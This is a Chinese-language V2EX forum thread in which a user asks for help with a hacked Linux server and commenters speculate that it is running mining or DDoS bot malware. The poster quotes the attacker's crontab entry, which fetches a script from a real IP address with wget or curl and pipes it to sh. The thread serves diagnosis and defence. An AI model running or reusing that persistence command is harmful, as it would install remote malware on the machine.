8

一个双显卡服务器被入侵了,他会定时从下载脚本并执行

 3 years ago
source link: https://www.v2ex.com/t/787835
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client
一个双显卡服务器被入侵了,他会定时从下载脚本并执行 - V2EX

V2EX  ›  Linux

一个双显卡服务器被入侵了,他会定时从下载脚本并执行

  rwecho · 22 小时 3 分钟前 · 1937 次点击
http://185.150.117.29/x/b

帮忙分析下这些脚本是干什么的?目前看显卡并没有运行,而是定时占用大量带宽。
14 条回复    2021-07-07 09:58:50 +08:00

virusdefender

virusdefender   21 小时 52 分钟前

这种一般都是挖矿

rwecho

rwecho   21 小时 50 分钟前

15 * * * * wget http://185.150.117.29/x/b -O- | sh || curl http://185.150.117.29/x/b | sh

它在电脑里面创建了一个用户名为:ps
然后里面有一个 crontab 命令

longbow0

longbow0   21 小时 37 分钟前

主要是从 185.150.117.29 下载适配了不同硬件版本的木马 bot.*

其中,bot.x86 介绍在 https://s.tencent.com/research/report/1101.html

CaffreySun

CaffreySun   21 小时 19 分钟前

这个脚步比较简单,就是“感染”你的服务器,并且创建定时任务重复“感染”。
至于他“感染”你的服务做什么,得看他执行的那些“bot”开头的程序了,找大佬反编译分析一下。
或许用来挖坑。
或许用来执行网络攻击。

Aresrun

Aresrun   18 小时 31 分钟前

我之前也被入侵了。服务器上没啥东西,就重装了系统

lopetver

lopetver   18 小时 24 分钟前

@rwecho 认真的吗

这只是一个定时下载的任务而已啊,哪里有“它在电脑里面创建了一个用户名为:ps
然后里面有一个 crontab 命令” 这些操作

missz

missz   17 小时 47 分钟前

把服务器做为肉鸡,用来 ddos,所以会时不时带宽拉满

no1xsyzy

no1xsyzy   15 小时 58 分钟前

命令行 HTTP 客户端竟然是 wget 和 curl 而没有 lynx
我记得哪个 Unix 环境是默认只有 lynx 的来着?

hlobo

hlobo   15 小时 52 分钟前 via iPhone

攻击它下载脚本的服务器

changchong

changchong   12 小时 16 分钟前

修改端口怎么样

yogogo

yogogo   2 小时 49 分钟前

前几天我一台也是给挂挖矿的,后来就关端口,开 selinux,就好了

rwecho

rwecho   1 小时 26 分钟前 via Android

已经把下载的脚本清空了,目前没看到有异常情况,之前 root 密码太弱了

lanshee

lanshee   59 分钟前

@rwecho #23 清空是治标不治本的.

关于   ·   帮助文档   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   3519 人在线   最高记录 5497   ·  

创意工作者们的社区

World is powered by solitude

VERSION: 3.9.8.5 · 18ms · UTC 02:58 · PVG 10:58 · LAX 19:58 · JFK 22:58
♥ Do have faith in what you're doing.


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK